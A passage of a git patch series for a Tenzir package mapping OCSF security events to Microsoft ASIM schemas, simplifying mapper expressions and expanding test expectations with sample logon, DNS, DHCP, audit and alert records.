(asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 7d4303a..2d52a32 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? From 1c928c6f0c2969a2c4fc95b0440a2aeb851cd8e7 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:37:47 +0200 Subject: [PATCH 14/27] Simplify Microsoft mapper tests Remove redundant fallback expressions now that optional spreads and nullable predicates are handled directly. Drop final select projections from the ASIM package tests so they validate the full mapped event shape. Assisted-by: GPT-5 Codex (Superconductor) --- .../asim/ocsf/file_system_activity.tql | 4 +- microsoft/tests/asim/graph.tql | 4 - microsoft/tests/asim/graph.txt | 128 +++++- microsoft/tests/asim/ocsf.tql | 5 - microsoft/tests/asim/ocsf.txt | 56 ++- microsoft/tests/asim/windows.tql | 6 +- microsoft/tests/asim/windows.txt | 131 +++++- microsoft/tests/ocsf-to-asim/alert.tql | 5 - microsoft/tests/ocsf-to-asim/alert.txt | 80 +++- microsoft/tests/ocsf-to-asim/audit.tql | 4 - microsoft/tests/ocsf-to-asim/audit.txt | 67 ++- .../tests/ocsf-to-asim/authentication.tql | 8 - .../tests/ocsf-to-asim/authentication.txt | 266 +++++++++-- .../tests/ocsf-to-asim/direct-targets.tql | 11 - .../tests/ocsf-to-asim/direct-targets.txt | 413 ++++++++++++------ microsoft/tests/ocsf-to-asim/process.tql | 5 - microsoft/tests/ocsf-to-asim/process.txt | 78 +++- .../tests/ocsf-to-asim/user-management.tql | 5 - .../tests/ocsf-to-asim/user-management.txt | 133 +++++- 19 files changed, 1137 insertions(+), 272 deletions(-) diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 9403a76..8ce30a7 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -28,10 +28,10 @@ asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1] if ocsf.activity_name == "Rename" and ocsf.file_result? != null { asim.SrcFilePath = asim.TargetFilePath asim.SrcFileName = asim.TargetFileName - asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local" + asim.SrcFilePathType = "Windows Local" if asim.SrcFilePath?.contains("\\") == true else "Unix Local" asim.TargetFilePath = ocsf.file_result.path? else asim.TargetFilePath asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName } -asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" +asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index 70141d8..68698dc 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -5,7 +5,3 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { microsoft::asim::map name = @name sort EventOriginalUid -select name, EventSchema, EventSchemaVersion, EventType, - EventResult, EventProduct, EventVendor, EventOriginalType, - EventOriginalUid, Dvc, SrcIpAddr=SrcIpAddr?, - TargetUsername, TargetUserId, TargetAppName=TargetAppName? diff --git a/microsoft/tests/asim/graph.txt b/microsoft/tests/asim/graph.txt index 5d5d9b8..1ac2942 100644 --- a/microsoft/tests/asim/graph.txt +++ b/microsoft/tests/asim/graph.txt @@ -1,16 +1,130 @@ { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventResult: "Success", + EventCount: 1, + EventStartTime: 2026-05-01T10:00:00Z, + EventEndTime: 2026-05-01T10:00:00Z, EventProduct: "Microsoft Entra ID", EventVendor: "Microsoft", - EventOriginalType: "300201", EventOriginalUid: "sign-in-1", + EventUid: "sign-in-1", + EventOriginalType: "300201", + EventSeverity: "Informational", + EventResult: "Success", + EventOriginalResultDetails: "0", Dvc: "Microsoft Entra ID", - SrcIpAddr: 203.0.113.10, + DvcAction: "Allowed", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventOriginalSubType: "interactiveUser", + ActorUsername: "example.com\\alice", + ActorUsernameType: "Windows", + ActorUserId: "user-1", + ActorUserIdType: null, + ActorSessionId: null, TargetUsername: "example.com\\alice", + TargetUsernameType: "Windows", + TargetDomain: "example.com", + TargetDomainType: "Windows", TargetUserId: "user-1", + TargetUserIdType: null, + TargetSessionId: null, + SrcIpAddr: 203.0.113.10, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: null, + TargetAppId: "app-1", TargetAppName: "Office 365", + LogonProtocol: null, + LogonMethod: "Push Notification", + AdditionalFields: { + action: "Allowed", + action_id: 1, + activity_id: 1, + activity_name: "Logon", + actor: { + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + type: "User", + type_id: 1, + uid: "user-1", + }, + }, + auth_factors: [ + { + factor_type: "Push Notification", + factor_type_id: 5, + }, + ], + category_name: "Identity & Access Management", + category_uid: 3, + class_name: "Authentication", + class_uid: 3002, + cloud: { + provider: "Azure", + }, + disposition: "Allowed", + disposition_id: 1, + dst_endpoint: { + svc_name: "Microsoft Graph", + uid: "resource-1", + }, + is_mfa: true, + is_remote: true, + logon_type: "interactiveUser", + logon_type_id: 99, + metadata: { + log_name: "auditLogs/signIns", + original_event_uid: "sign-in-1", + product: { + feature: { + name: "Microsoft Graph", + }, + name: "Microsoft Entra ID", + vendor_name: "Microsoft", + }, + profiles: [ + "cloud", + "security_control", + ], + version: "1.8.0", + }, + service: { + name: "Office 365", + uid: "app-1", + }, + severity: "Informational", + severity_id: 1, + src_endpoint: { + ip: 203.0.113.10, + location: { + city: "Berlin", + country: "DE", + }, + os: { + name: "Windows 11", + }, + uid: "device-1", + }, + status: "Success", + status_code: "0", + status_detail: "Other.", + status_id: 1, + time: 2026-05-01T10:00:00Z, + type_name: "Authentication: Logon", + type_uid: 300201, + unmapped: null, + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + type: "User", + type_id: 1, + uid: "user-1", + }, + }, + name: "asim.authentication", } diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index c8eb719..11e19d8 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -32,8 +32,3 @@ from { } microsoft::asim::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, - EventSubType, EventResult, EventProduct, EventVendor, - EventOriginalType, EventOriginalUid, Dvc, DnsQuery, - DnsQueryTypeName, DnsQueryClassName, EventResultDetails, - SrcIpAddr diff --git a/microsoft/tests/asim/ocsf.txt b/microsoft/tests/asim/ocsf.txt index 7b520b7..5670818 100644 --- a/microsoft/tests/asim/ocsf.txt +++ b/microsoft/tests/asim/ocsf.txt @@ -1,18 +1,60 @@ { - name: "asim.dns", - EventSchema: "Dns", - EventSchemaVersion: "0.1.7", - EventType: "Query", - EventSubType: "request", - EventResult: "Success", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:02Z, + EventEndTime: 2026-01-01T00:00:02Z, EventProduct: "DNS", EventVendor: "Microsoft", - EventOriginalType: "400301", EventOriginalUid: "dns-1", + EventUid: "dns-1", + EventOriginalType: "400301", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "dns1", + DvcHostname: "dns1", + DvcFQDN: "dns1", + EventSchema: "Dns", + EventSchemaVersion: "0.1.7", + EventType: "Query", + EventSubType: "request", DnsQuery: "example.org", DnsQueryTypeName: "A", DnsQueryClassName: "IN", EventResultDetails: "NA", SrcIpAddr: 10.0.0.1, + SrcHostname: null, + DstIpAddr: null, + DstHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + type_name: "DNS Activity: Query", + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, + }, + name: "asim.dns", } diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index eaa3966..9c85c19 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -4,8 +4,4 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { this = data.parse_winlog() microsoft::asim::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, - EventResult, EventProduct, EventVendor, EventOriginalType, - EventOriginalUid, Dvc, DvcHostname, SrcIpAddr=SrcIpAddr?, - TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType, - LogonProtocol=LogonProtocol? +drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt index d72b991..90b178f 100644 --- a/microsoft/tests/asim/windows.txt +++ b/microsoft/tests/asim/windows.txt @@ -1,19 +1,136 @@ { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventResult: "Success", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, EventProduct: "Microsoft-Windows-Security-Auditing", EventVendor: "Microsoft", - EventOriginalType: "4624", EventOriginalUid: "98761", + EventUid: "98761", + EventOriginalType: "4624", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", - SrcIpAddr: 10.0.0.42, + DvcFQDN: "DC01.corp.local", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventSubType: "Remote", + EventOriginalSubType: "Network", + ActorUsername: "S-1-0-0", + ActorUserId: "S-1-0-0", + ActorUserIdType: "SID", + ActorSessionId: "0x0", TargetUsername: "CORP\\jdoe", TargetUsernameType: "Windows", + TargetDomain: "CORP", + TargetDomainType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", TargetUserIdType: "SID", + TargetSessionId: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", + SrcIpAddr: 10.0.0.42, + SrcHostname: null, + SrcPortNumber: 49827, + TargetHostname: "DC01.corp.local", + TargetAppId: null, + TargetAppName: null, LogonProtocol: "Kerberos", + AdditionalFields: { + activity_id: 1, + activity_name: "Logon", + actor: { + session: { + uid_alt: "0x0", + }, + user: { + domain: null, + name: null, + uid: "S-1-0-0", + }, + }, + auth_protocol: "Kerberos", + auth_protocol_id: 2, + category_name: "Identity & Access Management", + category_uid: 3, + class_name: "Authentication", + class_uid: 3002, + device: { + hostname: "DC01.corp.local", + }, + logon_type: "Network", + logon_type_id: 3, + metadata: { + event_code: "4624", + extensions: [ + { + name: "win", + }, + ], + log_format: "xml", + log_level: "0", + log_name: "Security", + log_version: "2", + logged_time: 2024-03-23T12:34:56.789012300Z, + original_event_uid: "98761", + product: { + name: "Microsoft-Windows-Security-Auditing", + uid: "{5770385F-C994-4D63-B9EC-B6FE73E0CE8A}", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + session: { + uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", + uid_alt: "0xA1B2C3", + }, + severity: "Informational", + severity_id: 1, + src_endpoint: { + hostname: null, + ip: 10.0.0.42, + port: 49827, + }, + status: "Success", + status_id: 1, + time: 2024-03-23T12:34:56.789012300Z, + type_name: "Authentication: Logon", + type_uid: 300201, + unmapped: { + System: { + Task: 12544, + Keywords: "0x8020000000000000", + Correlation: { + ActivityID: "{abc123-def456}", + }, + Execution: { + ProcessID: 4, + ThreadID: 72, + }, + }, + EventData: { + LogonProcessName: "Kerberos", + TransmittedServices: null, + LmPackageName: null, + KeyLength: 0, + ProcessId: "0x0", + ProcessName: null, + ImpersonationLevel: "%%1833", + RestrictedAdminMode: null, + TargetOutboundUserName: null, + TargetOutboundDomainName: null, + VirtualAccount: "%%1843", + TargetLinkedLogonId: "0x0", + ElevatedToken: "%%1842", + }, + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + name: "asim.authentication", } diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql index cb1927d..a63ba80 100644 --- a/microsoft/tests/ocsf-to-asim/alert.tql +++ b/microsoft/tests/ocsf-to-asim/alert.tql @@ -53,8 +53,3 @@ from { @name = "ocsf.detection_finding" microsoft::asim::ocsf::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, EventUid, - EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName, - EventSubType, ThreatName, ThreatCategory, - ThreatOriginalCategory=ThreatOriginalCategory?, AlertStatus, - AlertOriginalStatus, AlertVerdict diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/ocsf-to-asim/alert.txt index 118437f..cdcba4e 100644 --- a/microsoft/tests/ocsf-to-asim/alert.txt +++ b/microsoft/tests/ocsf-to-asim/alert.txt @@ -1,19 +1,87 @@ { - name: "asim.alert_event", + EventCount: 1, + EventStartTime: 2026-05-01T10:10:00Z, + EventEndTime: 2026-05-01T10:12:00Z, + EventProduct: "Microsoft Defender", + EventVendor: "Microsoft", + EventOriginalUid: "alert-1", + EventUid: "alert-1", + EventOriginalType: "200401", + EventSeverity: "High", + EventResult: "NA", + Dvc: "Microsoft Defender", EventSchema: "AlertEvent", EventSchemaVersion: "0.1", EventType: "Alert", - EventUid: "alert-1", - EventSeverity: "High", - EventOriginalUid: "alert-1", - EventProduct: "Microsoft Defender", - EventVendor: "Microsoft", AlertName: "Suspicious PowerShell", + EventReportUrl: null, EventSubType: "Threat", ThreatName: "Trojan", ThreatCategory: "Malware", ThreatOriginalCategory: "malware", + Username: null, + UserId: null, + UserIdType: null, AlertStatus: "Active", AlertOriginalStatus: "New", AlertVerdict: "True Positive", + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + attacks: [ + { + technique: { + uid: "T1059", + }, + }, + ], + category_uid: 2, + category_name: "Findings", + class_uid: 2004, + class_name: "Detection Finding", + type_uid: 200401, + type_name: "Detection Finding: Create", + time: 2026-05-01T10:10:00Z, + end_time: 2026-05-01T10:12:00Z, + severity_id: 4, + severity: "High", + status_id: 1, + status: "New", + verdict: "True Positive", + metadata: { + log_name: "security/alerts_v2", + original_event_uid: "alert-1", + product: { + name: "Microsoft Defender", + vendor_name: "Microsoft", + feature: { + name: "Microsoft Graph", + }, + }, + profiles: [ + "cloud", + "incident", + "security_control", + ], + tenant_uid: "11111111-1111-1111-1111-111111111111", + version: "1.8.0", + }, + cloud: { + provider: "Azure", + }, + finding_info: { + uid: "alert-1", + title: "Suspicious PowerShell", + desc: "PowerShell launched with suspicious arguments.", + types: [ + "malware", + ], + }, + malware: [ + { + name: "Trojan", + }, + ], + }, + name: "asim.alert_event", } diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/ocsf-to-asim/audit.tql index 56aad19..af795f7 100644 --- a/microsoft/tests/ocsf-to-asim/audit.tql +++ b/microsoft/tests/ocsf-to-asim/audit.tql @@ -41,7 +41,3 @@ from { @name = "ocsf.event_log_activity" microsoft::asim::ocsf::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventOriginalType, Dvc, DvcHostname, Object, ObjectType, - Operation, ActorUsername, ActorUsernameType, ActorUserId, - ActorUserIdType diff --git a/microsoft/tests/ocsf-to-asim/audit.txt b/microsoft/tests/ocsf-to-asim/audit.txt index e9f470c..2e3fde0 100644 --- a/microsoft/tests/ocsf-to-asim/audit.txt +++ b/microsoft/tests/ocsf-to-asim/audit.txt @@ -1,18 +1,71 @@ { - name: "asim.audit_event", - EventSchema: "AuditEvent", - EventSchemaVersion: "0.1.2", - EventType: "Clear", - EventResult: "NA", - EventSeverity: "High", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Eventlog", + EventVendor: "Microsoft", + EventOriginalUid: "99001", + EventUid: "99001", EventOriginalType: "1102", + EventSeverity: "High", + EventResult: "NA", Dvc: "WINHOST01.corp.local", DvcHostname: "WINHOST01.corp.local", + DvcFQDN: "WINHOST01.corp.local", + EventSchema: "AuditEvent", + EventSchemaVersion: "0.1.2", + EventType: "Clear", + Operation: "Clear", Object: "Security", ObjectType: "Event Log", - Operation: "Clear", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", ActorUserIdType: "SID", + SrcIpAddr: null, + TargetHostname: null, + TargetIpAddr: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Clear", + category_uid: 1, + category_name: "System Activity", + class_uid: 1008, + class_name: "Event Log Activity", + type_uid: 100801, + type_name: "Event Log Activity: Clear", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 4, + severity: "High", + metadata: { + event_code: "1102", + log_name: "Security", + original_event_uid: "99001", + product: { + name: "Microsoft-Windows-Eventlog", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + process: { + pid: 4660, + }, + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + }, + name: "asim.audit_event", } diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql index 91d38ad..056ddfc 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.tql +++ b/microsoft/tests/ocsf-to-asim/authentication.tql @@ -146,11 +146,3 @@ from { microsoft::asim::ocsf::map name = @name sort EventOriginalUid -select name, EventSchema, EventSchemaVersion, EventType, - EventSubType=EventSubType?, EventOriginalSubType=EventOriginalSubType?, - EventResult, EventSeverity, EventProduct, EventVendor, EventOriginalType, - EventOriginalUid, Dvc, DvcHostname=DvcHostname?, - SrcIpAddr=SrcIpAddr?, SrcPortNumber=SrcPortNumber?, - TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType, - TargetAppName=TargetAppName?, TargetAppId=TargetAppId?, - LogonProtocol=LogonProtocol?, LogonMethod=LogonMethod? diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/ocsf-to-asim/authentication.txt index 7e37af7..49d599f 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.txt +++ b/microsoft/tests/ocsf-to-asim/authentication.txt @@ -1,78 +1,266 @@ { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventSubType: "Remote", - EventOriginalSubType: "Network", - EventResult: "Success", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, EventProduct: "Microsoft-Windows-Security-Auditing", EventVendor: "Microsoft", - EventOriginalType: "4624", EventOriginalUid: "98761", + EventUid: "98761", + EventOriginalType: "4624", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", - SrcIpAddr: 10.0.0.42, - SrcPortNumber: 49827, + DvcFQDN: "DC01.corp.local", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventSubType: "Remote", + EventOriginalSubType: "Network", + ActorUsername: "S-1-0-0", + ActorUserId: "S-1-0-0", + ActorUserIdType: "SID", + ActorSessionId: "0x0", TargetUsername: "CORP\\jdoe", TargetUsernameType: "Windows", + TargetDomain: "CORP", + TargetDomainType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", TargetUserIdType: "SID", - TargetAppName: null, + TargetSessionId: null, + SrcIpAddr: 10.0.0.42, + SrcHostname: null, + SrcPortNumber: 49827, + TargetHostname: "DC01.corp.local", TargetAppId: null, + TargetAppName: null, LogonProtocol: "Kerberos", - LogonMethod: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + auth_protocol: "Kerberos", + logon_type: "Network", + logon_type_id: 3, + metadata: { + event_code: "4624", + original_event_uid: "98761", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + src_endpoint: { + ip: 10.0.0.42, + port: 49827, + }, + actor: { + user: { + uid: "S-1-0-0", + }, + session: { + uid_alt: "0x0", + }, + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + name: "asim.authentication", } { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logoff", - EventSubType: null, - EventOriginalSubType: null, - EventResult: "Success", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:45:00Z, + EventEndTime: 2024-03-23T12:45:00Z, EventProduct: "Microsoft-Windows-Security-Auditing", EventVendor: "Microsoft", - EventOriginalType: "4634", EventOriginalUid: "98762", + EventUid: "98762", + EventOriginalType: "4634", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", - SrcIpAddr: null, - SrcPortNumber: null, + DvcFQDN: "DC01.corp.local", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logoff", + ActorUsername: null, + ActorUserId: null, + ActorUserIdType: null, + ActorSessionId: null, TargetUsername: "CORP\\jdoe", TargetUsernameType: "Windows", + TargetDomain: "CORP", + TargetDomainType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", TargetUserIdType: "SID", - TargetAppName: null, + TargetSessionId: null, + SrcIpAddr: null, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: "DC01.corp.local", TargetAppId: null, + TargetAppName: null, LogonProtocol: null, - LogonMethod: null, + AdditionalFields: { + activity_id: 2, + activity_name: "Logoff", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300202, + type_name: "Authentication: Logoff", + time: 2024-03-23T12:45:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4634", + original_event_uid: "98762", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + name: "asim.authentication", } { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventSubType: null, - EventOriginalSubType: null, - EventResult: "Success", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2026-05-01T10:00:00Z, + EventEndTime: 2026-05-01T10:00:00Z, EventProduct: "Microsoft Entra ID", EventVendor: "Microsoft", - EventOriginalType: "300201", EventOriginalUid: "sign-in-1", + EventUid: "sign-in-1", + EventOriginalType: "300201", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "Microsoft Entra ID", - DvcHostname: null, - SrcIpAddr: 203.0.113.10, - SrcPortNumber: null, + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + ActorUsername: "example.com\\alice", + ActorUsernameType: "Windows", + ActorUserId: "user-1", + ActorUserIdType: null, + ActorSessionId: null, TargetUsername: "example.com\\alice", TargetUsernameType: "Windows", + TargetDomain: "example.com", + TargetDomainType: "Windows", TargetUserId: "user-1", TargetUserIdType: null, - TargetAppName: "Office 365", + TargetSessionId: null, + SrcIpAddr: 203.0.113.10, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: null, TargetAppId: "app-1", + TargetAppName: "Office 365", LogonProtocol: null, LogonMethod: "Push Notification", + AdditionalFields: { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2026-05-01T10:00:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + log_name: "auditLogs/signIns", + original_event_uid: "sign-in-1", + product: { + name: "Microsoft Entra ID", + vendor_name: "Microsoft", + feature: { + name: "Microsoft Graph", + }, + }, + profiles: [ + "cloud", + "security_control", + ], + version: "1.8.0", + }, + cloud: { + provider: "Azure", + }, + actor: { + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + uid: "user-1", + }, + }, + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + uid: "user-1", + }, + src_endpoint: { + ip: 203.0.113.10, + uid: "device-1", + }, + dst_endpoint: { + svc_name: "Microsoft Graph", + uid: "resource-1", + }, + service: { + name: "Office 365", + uid: "app-1", + }, + auth_factors: [ + { + factor_type: "Push Notification", + factor_type_id: 5, + }, + ], + }, + name: "asim.authentication", } diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql index 6d4e3b4..aaecf95 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql @@ -185,14 +185,3 @@ from { microsoft::asim::ocsf::map name = @name sort EventOriginalUid -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventOriginalUid, Dvc, ActorUsername=ActorUsername?, - TargetFilePath=TargetFilePath?, TargetFilePathType=TargetFilePathType?, - TargetFileName=TargetFileName?, SrcFilePath=SrcFilePath?, - SrcFileName=SrcFileName?, SrcIpAddr=SrcIpAddr?, - SrcPortNumber=SrcPortNumber?, DstIpAddr=DstIpAddr?, - DstPortNumber=DstPortNumber?, SrcBytes=SrcBytes?, DstBytes=DstBytes?, - DnsQuery=DnsQuery?, DnsQueryTypeName=DnsQueryTypeName?, - DnsQueryClassName=DnsQueryClassName?, - EventResultDetails=EventResultDetails?, SrcHostname=SrcHostname?, - SrcMacAddr=SrcMacAddr?, Url=Url?, HttpRequestMethod=HttpRequestMethod? diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt index 89b0c39..0b7405c 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.txt +++ b/microsoft/tests/ocsf-to-asim/direct-targets.txt @@ -1,180 +1,339 @@ { - name: "asim.dhcp_event", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:03Z, + EventEndTime: 2026-01-01T00:00:03Z, + EventProduct: "DHCP", + EventVendor: "Microsoft", + EventOriginalUid: "dhcp-1", + EventUid: "dhcp-1", + EventOriginalType: "400405", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "dhcp1", + DvcHostname: "dhcp1", + DvcFQDN: "dhcp1", EventSchema: "DhcpEvent", EventSchemaVersion: "0.1.1", EventType: "Assign", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "dhcp-1", - Dvc: "dhcp1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: 10.0.0.50, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, SrcHostname: "client1", + SrcIpAddr: 10.0.0.50, SrcMacAddr: "00:11:22:33:44:55", - Url: null, - HttpRequestMethod: null, + AdditionalFields: { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, + }, + name: "asim.dhcp_event", } { - name: "asim.dns", + EventCount: 1, + EventStartTime: 